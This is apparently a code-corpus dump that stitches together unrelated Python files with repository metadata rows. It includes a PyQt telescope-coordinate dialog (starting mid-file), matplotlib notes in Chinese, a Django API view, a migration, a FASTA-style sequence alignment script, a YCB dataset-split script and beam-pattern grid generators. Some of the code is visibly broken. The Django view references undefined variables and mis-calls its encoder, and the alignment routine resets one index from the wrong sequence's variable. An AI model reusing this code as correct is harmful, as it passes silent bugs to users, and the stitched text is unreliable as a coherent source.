self.le_telescopeAzimut.setFont(font)
self.le_telescopeAzimut.setMouseTracking(False)
self.le_telescopeAzimut.setFocusPolicy(QtCore.Qt.NoFocus)
self.le_telescopeAzimut.setAcceptDrops(False)
self.le_telescopeAzimut.setLayoutDirection(QtCore.Qt.RightToLeft)
self.le_telescopeAzimut.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.le_telescopeAzimut.setReadOnly(True)
self.le_telescopeAzimut.setObjectName("le_telescopeAzimut")
self.le_telescopeAltitude = QtWidgets.QLineEdit(CoordinateDialog)
self.le_telescopeAltitude.setGeometry(QtCore.QRect(210, 40, 81, 21))
font = QtGui.QFont()
font.setFamily("Courier")
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.le_telescopeAltitude.setFont(font)
self.le_telescopeAltitude.setMouseTracking(False)
self.le_telescopeAltitude.setFocusPolicy(QtCore.Qt.NoFocus)
self.le_telescopeAltitude.setAcceptDrops(False)
self.le_telescopeAltitude.setLayoutDirection(QtCore.Qt.RightToLeft)
self.le_telescopeAltitude.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.le_telescopeAltitude.setReadOnly(True)
self.le_telescopeAltitude.setObjectName("le_telescopeAltitude")
self.label_9 = QtWidgets.QLabel(CoordinateDialog)
self.label_9.setGeometry(QtCore.QRect(20, 40, 31, 21))
font = QtGui.QFont()
font.setFamily("Courier")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.label_9.setFont(font)
self.label_9.setObjectName("label_9")
self.label_10 = QtWidgets.QLabel(CoordinateDialog)
self.label_10.setGeometry(QtCore.QRect(170, 40, 41, 21))
font = QtGui.QFont()
font.setFamily("Courier")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.label_10.setFont(font)
self.label_10.setObjectName("label_10")
self.label_109 = QtWidgets.QLabel(CoordinateDialog)
self.label_109.setGeometry(QtCore.QRect(140, 40, 21, 20))
font = QtGui.QFont()
font.setFamily("Courier")
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.label_109.setFont(font)
self.label_109.setAlignment(QtCore.Qt.AlignCenter)
self.label_109.setWordWrap(False)
self.label_109.setObjectName("label_109")
self.label_110 = QtWidgets.QLabel(CoordinateDialog)
self.label_110.setGeometry(QtCore.QRect(290, 40, 21, 20))
font = QtGui.QFont()
font.setFamily("Courier")
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.label_110.setFont(font)
self.label_110.setAlignment(QtCore.Qt.AlignCenter)
self.label_110.setWordWrap(False)
self.label_110.setObjectName("label_110")
self.retranslateUi(CoordinateDialog)
QtCore.QMetaObject.connectSlotsByName(CoordinateDialog)
def retranslateUi(self, CoordinateDialog):
_translate = QtCore.QCoreApplication.translate
CoordinateDialog.setWindowTitle(_translate("CoordinateDialog", "Form"))
self.windowTitle.setText(_translate("CoordinateDialog", "Pointing Coordinates / Modeling"))
self.btn_selectClose.setToolTip(_translate("CoordinateDialog", "Sets dual tracking on / off"))
self.btn_selectClose.setText(_translate("CoordinateDialog", "X"))
self.modellingLog.setHtml(_translate("CoordinateDialog", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:8pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>"))
self.le_telescopeAzimut.setText(_translate("CoordinateDialog", "130,05"))
self.le_telescopeAltitude.setText(_translate("CoordinateDialog", "80,50"))
self.label_9.setText(_translate("CoordinateDialog", "AZ:"))
self.label_10.setText(_translate("CoordinateDialog", "ALT:"))
self.label_109.setText(_translate("CoordinateDialog", "°"))
self.label_110.setText(_translate("CoordinateDialog", "°"))
| UTF-8 | Python | false | false | 7,427 | py | 14 | coordinate_dialog_ui.py | 10 | 0.691178 | 0.658855 | 0 | 144 | 50.555556 | 174 |
north-jewel/data_analysis | 13,761,075,243,114 | ffc15645c52a881e3ad0ec51fb997880c1c2d6f4 | a886d4a2fc8febfff2686cb829b9cfaba2945f43 | /homework/赵孟-mrzhao666/笔记/画图笔记.py | d865d9cda370170fb7dc3ae6e36daa7cae5491f1 | []
| no_license | https://github.com/north-jewel/data_analysis | 017f4eedd6c1f00f187f9736d1b9afd980e97e0b | 6e077a6d777d9a339095fb133b7d9a6f9d408743 | refs/heads/master | 2020-04-03T20:32:39.514601 | 2019-01-06T12:52:16 | 2019-01-06T12:52:16 | 155,548,428 | 8 | 6 | null | false | 2018-11-20T09:13:38 | 2018-10-31T11:46:17 | 2018-11-20T09:11:40 | 2018-11-20T09:13:37 | 1,467 | 4 | 3 | 0 | Jupyter Notebook | false | null | import matplotlib.pyplot as plt
#散点图,marker形状
plt.scatter(x,y,s = 大小,c = 颜色,marker = '*')
#柱形图,
plt.bar(x,height = y,bottom = '从哪里开始图色')
#饼状图,参数:数据,要不要突出,数据标签,
#百分比的小数位,带不带阴影,从多少度开始画
plt.pie(sizes,explode = explode,
labels = labels,autopct = '%1.2f%%',shadow = True,startangle = 90)
plt.plot(x,y,color = 'red',linewidth = 4.0,linestyle = '--',label='sin',alpha = 0.5)
#linewidth 线宽, linestyle:线的样式,label:图例,alpha:透明度
plt.legend() #调用这个函数后label才会生效
plt.figure(1)#要画几个图
#正常显示中文和负号
from pylab import mpl
mpl.rcParams['font.sans-serif']=['SimHei'] #中文
mpl.rcParams['axes.unicode_minus']=False #负号
plt.title('表头名字')
plt.xlabel('x轴名字')
plt.ylabel('y轴名字')
#设置这个图的大小,第三个参数是宽,第四个是高。单位是倍数。
#facecolor:背景颜色
plt.axes([1,0,1,1],facecolor = 'red')
#把画的图保存到本地
plt.savefig(r'C:/Users/赵孟/Desktop/微信.png')
#三个参数,把画布分成3行3列,这个图占第一个位置
ax = fig.add_subplot(331)
#调用以下函数后会把画出的图变成网格图
plt.grid()
#指定轴的数值范围
plt.xlim([-1.5,1.5])
plt.ylim([-1.5,1.5])
#操作轴之前必须调用这个函数
ax = plt.gca()
#使右边的轴消失
ax.spines['right'].set_color('none')
#让左轴和下轴移到1的位置
ax.spines['left'].set_position(('data',1))
ax.spines['bottom'].set_position(('data',1))
#修改x和y轴标记位置
ax.xaxis.set_ticks_position('top')
ax.yaxis.set_ticks_position('left')
#设置x和y轴的比例
ax.set_aspect(1)
#改x轴上标记
plt.yticks(原标记,np.linspace(-1,1,5))
plt.xticks([-np.pi,-np.pi/2,0.9,np.pi/2,np.pi],[r'$-\pi$',r'$-\pi/2$',r'$0$',r'$+\pi/2$',r'$\pi$'])
#填充颜色
plt.fill(x,y,'颜色')
#迭代x,y轴的标签,改变其样式
for label in ax.get_xticklabels()+ax.get_yticklabels():
label.set_fontsize(12)#字体大小
label.set_bbox(dict(facecolor='yellow',edgecolor='red',alpha = 0.8))
#facecolor:标签背景颜色,edgecolor:边框颜色,alpha透明度
#注释,
plt.annotate("(4,4)",xy=(4,4),xycoords='data',xytext=(3,2),
arrowprops = dict(arrowstyle='<|-|>'))
# xytext 默认标记的坐标的绝对位置,没有的话用xy参数的
# textcoords 指定相对位置,相对点 和相对像素
# 箭头arrowprops 箭头风格connectionstyle
| UTF-8 | Python | false | false | 2,556 | py | 488 | 画图笔记.py | 202 | 0.674332 | 0.647594 | 0 | 91 | 19.494505 | 99 |
dash1291/smexplorer | 3,384,434,242,900 | 1c6ae39dad5d277561f5c3cdd0d4f36f47849541 | f2bde53e6d7182823c3241a2d924e31ce88ac9ca | /api/views.py | 0608f53525025e95d7f2064be94ee8b8f4ad7ce9 | []
| no_license | https://github.com/dash1291/smexplorer | 1ed1a4303a2a812c202de3343adb4fbb34245f10 | f431431f0b009db80be51d1acc9e419730740b52 | refs/heads/master | 2022-01-24T01:12:48.022959 | 2012-11-28T12:11:49 | 2012-11-28T12:11:49 | 3,686,886 | 1 | 0 | null | false | 2022-01-06T22:22:55 | 2012-03-11T13:29:10 | 2014-01-20T14:30:59 | 2022-01-06T22:22:55 | 528 | 4 | 3 | 2 | Python | false | false | from django.http import HttpResponse
from api.helpers import encode_xml, encode_json
from explorer.models import Directory, File
class ApiBase(object):
def __call__(self, request, *args, **kwargs):
self.format = request.REQUEST.get('format')
self.mimetype = ('text/xml' if self.format == 'xml ' else 'application/json')
self.process_request(*args, **kwargs)
def build_response(self, response_array):
if self.format == 'xml':
response_str = self.encode_xml(response_array)
else:
response_str = self.encode_json(response_array)
response_str = self.encode_response()
return response_str
def render(self, response_array):
return HttpResponse(self.build_response(response_array))
class DataApi(ApiBase):
def process_request(self, *args, **kwargs):
if object_type == 'folder':
if action == 'list':
self.list_directory(uid)
def list_directory(self, file_path):
files = File.objects.filter(path=file_path)
files_array = []
for file in files:
files_array.append({'name': file.name})
return self.render({'files': files_array}) | UTF-8 | Python | false | false | 1,084 | py | 27 | views.py | 15 | 0.701107 | 0.701107 | 0 | 38 | 27.552632 | 79 |
jmhubbard/quote_of_the_day_custom_user | 14,113,262,554,693 | 06044e1a90200ea2fd43df4a1c20efba2d3f4cda | c074fb834cb4a8ac75d107146df10f9496590792 | /shows/migrations/0003_show_subscribers.py | d41d63880823db5c96ce280c69de7690bd2261cb | [
"Unlicense"
]
| permissive | https://github.com/jmhubbard/quote_of_the_day_custom_user | 4d5ffd4183d7e6290161b84cae2aa1f7ad621a99 | 27024b2953c1c94fd2970563c3ab31ad444912b6 | refs/heads/master | 2023-02-19T00:59:27.372671 | 2021-01-10T02:45:56 | 2021-01-10T02:45:56 | 293,443,918 | 1 | 0 | Unlicense | false | 2020-12-03T17:59:59 | 2020-09-07T06:41:25 | 2020-12-03T08:41:21 | 2020-12-03T17:59:59 | 607 | 1 | 0 | 0 | Python | false | false | # Generated by Django 3.1.1 on 2020-09-09 03:24
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('subscriptions', '0002_subscription_is_subscribed'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('shows', '0002_show_name'),
]
operations = [
migrations.AddField(
model_name='show',
name='subscribers',
field=models.ManyToManyField(through='subscriptions.Subscription', to=settings.AUTH_USER_MODEL),
),
]
| UTF-8 | Python | false | false | 596 | py | 81 | 0003_show_subscribers.py | 58 | 0.647651 | 0.60906 | 0 | 21 | 27.380952 | 108 |
FaiZaman/Dynamic-Heuristic-Local-Alignments | 18,614,388,276,960 | 5e957e3e4cfcdcf17e6d97251fd4a948646b5d0b | dfcaa807af88352027a5ec63418b42cf6daaa883 | /FASTA.py | ae4f4591f04085bdfdf27a52da94c234a9b5c21e | [
"MIT"
]
| permissive | https://github.com/FaiZaman/Dynamic-Heuristic-Local-Alignments | 2093cc8ddfef54aceeb01ce0c7cd684351cd85e8 | 15bff8ddbf66e4c6bb53537562f8976752cef935 | refs/heads/master | 2020-09-21T20:17:10.457814 | 2019-12-08T14:33:25 | 2019-12-08T14:33:25 | 224,914,557 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
from heapq import nlargest
def heuralign(alphabet, substitution_matrix, seq1, seq2):
# defining parameters
ktup = 2 # length of matches
cutoff_score = -3 # cutoff score when scoring diagonals
width = 29 # width of band for banded DP
n = 3 # number of diagonals to run banded DP on
# get the index table and seeds
index_table = get_index_table(ktup, seq1)
diagonal_seeds = get_seeds(ktup, index_table, seq2)
# score the diagonals
diagonal_score = score_diagonals(alphabet, substitution_matrix, seq1, seq2, ktup, cutoff_score, diagonal_seeds)
# get the n best diagonals and run banded DP on them
best_diagonals = nlargest(n, diagonal_score, key=diagonal_score.get)
indices = banded_DP(alphabet, substitution_matrix, seq1, seq2, best_diagonals, width)
return (int(indices[0]), indices[1], indices[2])
def get_index_table(ktup, seq1):
index_table = {}
# go through seq1 and store ktup strings in index table
for letter_index in range(0, len(seq1) - ktup + 1):
match = seq1[letter_index:letter_index + ktup]
if match in index_table:
index_table[match].append(letter_index)
else:
index_table[match] = [letter_index]
return index_table
def get_seeds(ktup, index_table, seq2):
# go through seq2 and get seeds by matching to index table
seeds = {}
for letter_index in range(0, len(seq2) - ktup + 1):
match = seq2[letter_index:letter_index + ktup]
if match in index_table:
for seq1_position in index_table[match]:
diagonal = seq1_position - letter_index
if diagonal in seeds:
seeds[diagonal].append((seq1_position, letter_index))
else:
seeds[diagonal] = [(seq1_position, letter_index)]
return seeds
def score_diagonals(alphabet, substitution_matrix, seq1, seq2, ktup, cutoff_score, diagonal_seeds):
# initialise diagonal score dictionary
diagonal_score = {}
# initalise diagonal entries
for diagonal in diagonal_seeds:
diagonal_score[diagonal] = 0
# loop through diagonals and find best score
for diagonal in diagonal_seeds:
for (seed_i, seed_j) in diagonal_seeds[diagonal]:
updated = True
# get the score for matching the current seed
current_score = 0
for k in range(0, ktup):
seq1_letter = seq1[seed_i + k]
seq2_letter = seq2[seed_j + k]
current_score += substitution_matrix[alphabet.index(seq1_letter)][alphabet.index(seq2_letter)]
# initialise max score and current and best endpoints of alignments
max_score = current_score
seq1_current_start_index = seed_i
seq2_current_start_index = seed_j
seq1_current_end_index = seed_i + ktup
seq2_current_end_index = seed_j + ktup
seq1_best_start_index = seed_i
seq2_best_start_index = seed_j
seq1_best_end_index = seed_i + ktup
seq2_best_end_index = seed_j + ktup
while updated:
updated = False
while current_score > cutoff_score: # extend left
seq1_current_start_index -= 1
seq2_current_start_index -= 1
if seq1_current_start_index < 0 or seq2_current_start_index < 0:
break
seq1_letter = seq1[seq1_current_start_index]
seq2_letter = seq2[seq2_current_start_index]
# get score for a match
current_score += substitution_matrix[alphabet.index(seq1_letter)][alphabet.index(seq2_letter)]
if current_score > max_score:
updated = True
max_score = current_score
seq1_best_start_index = seq1_current_start_index
seq2_best_start_index = seq2_current_start_index
# reset to best score and indices
seq1_current_start_index = seq1_best_start_index
seq2_current_start_index = seq1_best_start_index
while current_score > cutoff_score: # extend right
seq1_current_end_index += 1
seq2_current_end_index += 1
if seq1_current_end_index > len(seq1) - 1 or seq2_current_end_index > len(seq2) - 1:
break
seq1_letter = seq1[seq1_current_end_index]
seq2_letter = seq2[seq2_current_end_index]
# get score for a match
current_score += substitution_matrix[alphabet.index(seq1_letter)][alphabet.index(seq2_letter)]
if current_score > max_score:
updated = True
max_score = current_score
seq1_best_end_index = seq1_current_end_index
seq2_best_end_index = seq2_current_end_index
seq1_current_end_index = seq1_best_end_index
seq2_current_end_index = seq2_best_end_index
# if seeds absorbed then remove them from the diagonal dictionary
for (seed_k, seed_l) in diagonal_seeds[diagonal]:
index = diagonal_seeds[diagonal].index((seed_k, seed_l))
if seed_k != seed_i and seed_l != seed_j: # not current seeds
if seq1_best_start_index < seed_k < seq1_best_end_index:
del diagonal_seeds[diagonal][index]
diagonal_score[diagonal] = max(diagonal_score[diagonal], max_score)
return diagonal_score
def banded_DP(alphabet, substitution_matrix, seq1, seq2, best_diagonals, width):
# initialise overall max score data
diagonal_max_score = 0
diagonal_max_score_row = -1
diagonal_max_score_column = -1
diagonal_backtracking_matrix = np.empty((len(seq2) + 1, len(seq1) + 1))
for diagonal in best_diagonals:
# initialise loop max score data and got band values
max_score, max_score_row, max_score_column = 0, -1, -1
diagonal *= -1
upper_diagonal = diagonal + width
lower_diagonal = diagonal - width
# initialise matrices using np.empty therefore being subquadratic time
scoring_matrix = np.empty((len(seq2) + 1, len(seq1) + 1))
backtracking_matrix = np.empty((len(seq2) + 1, len(seq1) + 1))
# initialise first row and column
scoring_matrix[0] = 0
scoring_matrix[:,0] = 0
# run local alignment on the cells in the band
for row in range(1, len(seq2) + 1):
lower_band = max(row - upper_diagonal, 1)
upper_band = min(row - lower_diagonal, len(seq1)) + 1
for column in range(lower_band, upper_band):
# get the score and where it comes from
score_data = calculate_score_data(row, column, lower_band, upper_band, alphabet, substitution_matrix, scoring_matrix, seq1, seq2)
score, score_origin = score_data[0], score_data[1]
# replace max score data if greater
if score > max_score:
max_score = score
max_score_row = row
max_score_column = column
scoring_matrix[row][column] = score
backtracking_matrix[row][column] = score_origin
# replace overall max score data if greater
if max_score > diagonal_max_score:
diagonal_max_score = max_score
diagonal_max_score_row = max_score_row
diagonal_max_score_column = max_score_column
diagonal_backtracking_matrix = backtracking_matrix
indices = get_indices(diagonal_backtracking_matrix, diagonal_max_score_row, diagonal_max_score_column)
return (diagonal_max_score, indices[0], indices[1])
def calculate_score_data(row, column, lower_band, upper_band, alphabet, substitution_matrix, scoring_matrix, seq1, seq2):
# calculate and return the best score and its origin for the current scoring matrix cell
seq1_letter = seq1[column - 1]
seq2_letter = seq2[row - 1]
match_score = substitution_matrix[alphabet.index(seq1_letter)][alphabet.index(seq2_letter)]
diagonal_score = scoring_matrix[row - 1][column - 1] + match_score
if lower_band <= column - 1 <= upper_band:
left_score = scoring_matrix[row][column - 1] + substitution_matrix[alphabet.index(seq1_letter)][-1]
else:
left_score = -1
if lower_band <= row - 1 <= upper_band:
up_score = scoring_matrix[row - 1][column] + substitution_matrix[alphabet.index(seq2_letter)][-1]
else:
up_score = -1
# check if the max score is out of bounds
score = max(diagonal_score, up_score, left_score, 0)
score_origin = 0
# 8 = DIAGONAL, 2 = UP, 4 = LEFT
if score == diagonal_score:
score_origin = 8
elif score == up_score:
score_origin = 2
else:
score_origin = 4
return (score, score_origin)
def get_indices(backtracking_matrix, row, column):
seq1_indices = []
seq2_indices = []
seq1_alignment = ""
seq2_alignment = ""
# iterate through backtracking matrix starting with cell which has the max score
# iterate while collecting indices for the best alignment for both sequences
while row > 0 and column > 0:
score_origin = backtracking_matrix[row][column]
if score_origin == 8:
seq1_alignment += seq1[column - 1]
seq2_alignment += seq2[row - 1]
row = row - 1
column = column - 1
seq1_indices.append(column)
seq2_indices.append(row)
elif score_origin == 2:
seq1_alignment += '-'
seq2_alignment += seq2[row - 1]
row = row - 1
else:
seq1_alignment += seq1[column - 1]
seq2_alignment += '-'
column = column - 1
seq1_indices.sort()
seq2_indices.sort()
seq1_alignment = seq1_alignment[::-1]
seq2_alignment = seq2_alignment[::-1]
displayAlignment([seq1_alignment, seq2_alignment])
return (seq1_indices, seq2_indices)
def displayAlignment(alignment):
string1 = alignment[0]
string2 = alignment[1]
string3 = ''
for i in range(min(len(string1), len(string2))):
if string1[i] == string2[i]:
string3 = string3 + "|"
else:
string3 = string3 + " "
print('String1: ' + string1)
print(' ' + string3)
print('String2: ' + string2 + '\n\n')
alphabet = "ABCD"
substitution_matrix = [[1, -5, -5, -5, -1],
[-5, 1, -5, -5, -1],
[-5, -5, 5, -5, -4],
[-5, -5, -5, 6, -4],
[-1, -1, -4, -4, -9]]
seq1 = "DDCDDCCCDCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCDDDCDADCDCDCDCD"
seq2 = "DDCDDCCCDCBCCCCDDDCDBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDCDCDCDCD"
alignments = heuralign(alphabet, substitution_matrix, seq1, seq2)
print("Score: ", alignments[0])
print("Indices: ", alignments[1], alignments[2]) | UTF-8 | Python | false | false | 9,874 | py | 7 | FASTA.py | 4 | 0.669232 | 0.642901 | 0 | 300 | 31.916667 | 133 |
yuxng/posecnn-pytorch | 16,045,997,827,370 | 47eb9e7ab79c046d06d536d83ead09d4678a5d4d | 4bb67e283093cc8c6b087b1be5be2393518e8da7 | /ycb_toolbox/compute_train_test_sets.py | 6da19b9322231b87c8222a1babec3a563b6e115d | [
"MIT"
]
| permissive | https://github.com/yuxng/posecnn-pytorch | cc6a0f88eebbfc6cde0948510d2ed3c74b75faea | 58ff2320eb97e458f4514bae2d7e4ac0e677024b | refs/heads/master | 2023-07-02T07:34:09.913514 | 2021-07-30T05:02:40 | 2021-07-30T05:02:40 | 149,823,279 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
import os.path as osp
import numpy as np
import glob
import scipy.io
from ycb_globals import ycb_video
this_dir = os.getcwd()
root_path = osp.join(this_dir, '..', 'data', 'YCB_Self_Supervision', 'data')
opt = ycb_video()
classes = opt.classes
num_scenes = 0
num_images = 0
num_classes = len(classes)
num_scenes_test = 0
num_images_test = 0
count_test = np.zeros((num_classes, ), dtype=np.int32)
percentages = [0.2, 0.4, 0.6, 0.8, 1.0]
num = len(percentages)
num_scenes_train = np.zeros((num, ), dtype=np.int32)
num_images_train = np.zeros((num, ), dtype=np.int32)
count_train = np.zeros((num_classes, num), dtype=np.int32)
scenes_train = [[] for i in range(num)]
scenes_test = []
scenes_all = []
# list subdirs
subdirs = os.listdir(root_path)
for i in range(len(subdirs)):
subdir = subdirs[i]
path_sub = osp.join(root_path, subdir)
# list subsubdirs
subsubdirs = [o for o in os.listdir(path_sub) if osp.isdir(osp.join(path_sub, o))]
length = len(subsubdirs)
# perturb
per = np.random.permutation(length)
subsubdirs = [subsubdirs[i] for i in per]
for j in range(length):
subsubdir = subsubdirs[j]
folder = osp.join(subdir, subsubdir) + '\n'
print(folder)
scenes_all.append(folder)
num_scenes += 1
if j < length / 2:
scenes_test.append(folder)
is_train = 0
num_scenes_test += 1
else:
if length == 1:
ind = 1
else:
ind = float(j - length / 2) / float(length / 2)
for k in range(num):
if ind <= percentages[k]:
num_scenes_train[k] += 1
scenes_train[k].append(folder)
is_train = 1
folder = osp.join(root_path, subdir, subsubdir)
filename = osp.join(folder, '*.mat')
files = glob.glob(filename)
for k in range(len(files)):
filename = files[k]
num_images += 1
# load the annotation to see if the target object is in the image
meta_data = scipy.io.loadmat(filename)
cls_indexes = meta_data['cls_indexes'].flatten()
if is_train:
for k in range(num):
if ind <= percentages[k]:
count_train[cls_indexes - 1, k] += 1
num_images_train[k] += 1
else:
count_test[cls_indexes - 1] += 1
num_images_test += 1
print('num of scenes: %d' % (num_scenes))
print('num of images: %d' % (num_images))
for k in range(num):
print('=============training %.2f=================' % (percentages[k]))
print('num of scenes: %d' % (num_scenes_train[k]))
print('num of images: %d' % (num_images_train[k]))
for i in range(num_classes):
if count_train[i, k] > 0:
print('%s: %d' % (classes[i], count_train[i, k]))
print('==============================')
print('=============testing=================')
print('num of scenes: %d' % (num_scenes_test))
print('num of images: %d' % (num_images_test))
for i in range(num_classes):
if count_test[i] > 0:
print('%s: %d' % (classes[i], count_test[i]))
print('==============================')
# write index files
outdir = 'ycb_self_supervision'
filename = osp.join(outdir, 'test.txt')
scenes_test.sort()
with open(filename, 'w') as f:
for i in range(len(scenes_test)):
f.write(scenes_test[i])
f.close()
for i in range(num):
scenes = scenes_train[i]
filename = osp.join(outdir, 'train_%d.txt' % (i+1))
scenes.sort()
with open(filename, 'w') as f:
for i in range(len(scenes)):
f.write(scenes[i])
f.close()
filename = osp.join(outdir, 'all.txt')
scenes_all.sort()
with open(filename, 'w') as f:
for i in range(len(scenes_all)):
f.write(scenes_all[i])
f.close()
| UTF-8 | Python | false | false | 3,900 | py | 164 | compute_train_test_sets.py | 144 | 0.546923 | 0.535897 | 0 | 132 | 28.545455 | 86 |
XiaodongRencologne/FYST_HOLO | 16,166,256,934,546 | d1ae69c276d971f2a755702576476462eb7ed12c | a33ef12a873b8626b18bb0194a2fca809024c7cd | /Kirchhoffpy/BeamPattern.py | 17394a5bbb152b10eca1927ff94c340d2d2cf1ad | []
| no_license | https://github.com/XiaodongRencologne/FYST_HOLO | 707c08c11549a29c58bb9327d02d3628a7b2c73e | 07b39c56e56451c8e6579c81255516f5425c4fc5 | refs/heads/master | 2023-06-02T18:42:14.405286 | 2022-08-15T19:47:06 | 2022-08-15T19:47:06 | 379,660,118 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
#!/usr/bin/env python
# In[1]:
import numpy as np;
import matplotlib.pyplot as plt;
# In[22]:
'''1. square pattern'''
def squarePattern(u0,v0,urange,vrange,Nu,Nv,file='',distance='far',Type='on-axis'):
if Type=='on-axis':
grid=np.moveaxis(np.meshgrid(np.linspace(-urange/2,urange/2,Nu),np.linspace(-vrange/2,vrange/2,Nv)),0,-1);
x=grid[...,0].ravel();
y=grid[...,-1].ravel();
z=np.sqrt(1-x**2-y**2);
del(grid);
if distance=='far':
pass
else:
x=distance*x;
y=distance*y;
z=distance*z;
grid=np.concatenate((x,y,z)).reshape(3,-1).T;
np.savetxt(file+'/on-axis.txt',grid,delimiter=',');
return 0;
else:
grid=np.moveaxis(np.meshgrid(np.linspace(-urange/2,urange/2,Nu),np.linspace(-vrange/2,vrange/2,Nv)),0,-1);
x=grid[...,0].ravel();
y=grid[...,-1].ravel();
del(grid);
''' produce 4 beams'''
# pos pos
xpp=x+u0;
ypp=y-v0;
zpp=np.sqrt(1-xpp**2-ypp**2);
# pos neg;
xpn=x+u0;
ypn=y+v0;
zpn=np.sqrt(1-xpn**2-ypn**2);
# neg pos
xnp=x-u0
ynp=y-v0
znp=np.sqrt(1-xnp**2-ynp**2);
# neg neg
xnn=x-u0
ynn=y+v0
znn=np.sqrt(1-xnn**2-ynn**2);
if distance=='far':
grid=np.concatenate((xpp,ypp,zpp)).reshape(3,-1).T;
np.savetxt(file+'/pos_pos_far.txt',grid);
grid=np.concatenate((xpn,ypn,zpn)).reshape(3,-1).T;
np.savetxt(file+'/pos_neg_far.txt',grid);
grid=np.concatenate((xnp,ynp,znp)).reshape(3,-1).T;
np.savetxt(file+'/neg_pos_far.txt',grid);
grid=np.concatenate((xnn,ynn,znn)).reshape(3,-1).T;
np.savetxt(file+'/neg_neg_far.txt',grid);
else:
grid=(np.concatenate((xpp,ypp,zpp)).reshape(3,-1).T)*distance;
np.savetxt(file+'/pos_pos_near.txt',grid);
grid=np.concatenate((xpn,ypn,zpn)).reshape(3,-1).T*distance;
np.savetxt(file+'/pos_neg_near.txt',grid);
grid=np.concatenate((xnp,ynp,znp)).reshape(3,-1).T*distance;
np.savetxt(file+'/neg_pos_near.txt',grid);
grid=np.concatenate((xnn,ynn,znn)).reshape(3,-1).T*distance;
np.savetxt(file+'/neg_neg_near.txt',grid);
return 1
'''2. plane field'''
def plane(sizex,sizey,Nx,Ny,distance,file=''):
grid=np.moveaxis(np.meshgrid(np.linspace(-sizex/2,sizex/2,Nx),np.linspace(-sizey/2,sizey/2,Ny)),0,-1);
x=grid[...,0].ravel();
y=grid[...,-1].ravel();
z=np.ones(x.size)*distance;
grid=np.concatenate((x,y,z)).reshape(3,-1).T
np.savetxt(file+'plane'+str(distance)+'mm.txt',grid);
return 1;
# In[ ]:
| UTF-8 | Python | false | false | 2,840 | py | 40 | BeamPattern.py | 15 | 0.530282 | 0.502465 | 0 | 95 | 28.852632 | 114 |
clambin/covid19mon | 6,622,839,597,753 | 214f97a464f157da01b5b46c18681b5ab2daa21e | 5d3f205eef66a1b9dd9c6112e197231b60ec9433 | /covid19/monitor/monitor.py | 376880b68e5f928d798b11cbc53c379835ccabb7 | [
"MIT"
]
| permissive | https://github.com/clambin/covid19mon | 4becb44f608edb119168402066e0b1ad1e3b9c59 | 78a2f7144f4b15c707208115ea99bea772eb95f6 | refs/heads/master | 2023-01-14T13:52:03.543914 | 2020-11-22T23:28:48 | 2020-11-22T23:28:48 | 260,452,755 | 0 | 0 | MIT | false | 2020-11-16T21:00:31 | 2020-05-01T12:22:01 | 2020-10-15T13:07:35 | 2020-11-16T21:00:31 | 255 | 0 | 0 | 0 | Python | false | false | import logging
from prometheus_client import start_http_server
from pimetrics.scheduler import Scheduler
from covid19.version import version
from covid19.monitor.configuration import print_configuration
from covid19.probes.population import PopulationProbe
from covid19.pgconnectors.population import PopulationPGConnector
from covid19.probes.covid import CovidCountryProbe, CovidLastUpdateProbe
from covid19.pgconnectors.covid import CovidPGConnector
def initialise(configuration):
scheduler = Scheduler()
if configuration.postgres_host:
populationconn = PopulationPGConnector(
host=configuration.postgres_host,
port=configuration.postgres_port,
database=configuration.postgres_database,
user=configuration.postgres_user,
password=configuration.postgres_password
)
scheduler.register(PopulationProbe(configuration.apikey, populationconn), 60 * 60 * 24)
covidconn = CovidPGConnector(
host=configuration.postgres_host,
port=configuration.postgres_port,
database=configuration.postgres_database,
user=configuration.postgres_user,
password=configuration.postgres_password
)
else:
covidconn = None
scheduler.register(
CovidCountryProbe(configuration.apikey, covidconn, configuration.pushgateway), configuration.interval
)
scheduler.register(
CovidLastUpdateProbe(configuration.apikey), configuration.interval
)
return scheduler
def main(configuration):
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S',
level=logging.DEBUG if configuration.debug else logging.INFO)
logging.info(f'Starting covid19mon v{version}')
logging.info(f'Configuration: {print_configuration(configuration)}')
start_http_server(configuration.port)
scheduler = initialise(configuration)
if configuration.once:
scheduler.run(once=True)
else:
while True:
scheduler.run(duration=configuration.interval)
return 0
| UTF-8 | Python | false | false | 2,136 | py | 32 | monitor.py | 23 | 0.717697 | 0.707865 | 0 | 58 | 35.827586 | 109 |
NicktheGreek1985/PythonCGIProjects | 15,324,443,312,186 | bcfc3637c9bfb32fbeb9f092105c65725e49d82d | dc0450275755946f39d232474df9e9e1bc38177f | /DBs Using Python CGI/Mondial/provinces_25.py | debba145566b573694e6cf2719faea2e28851665 | []
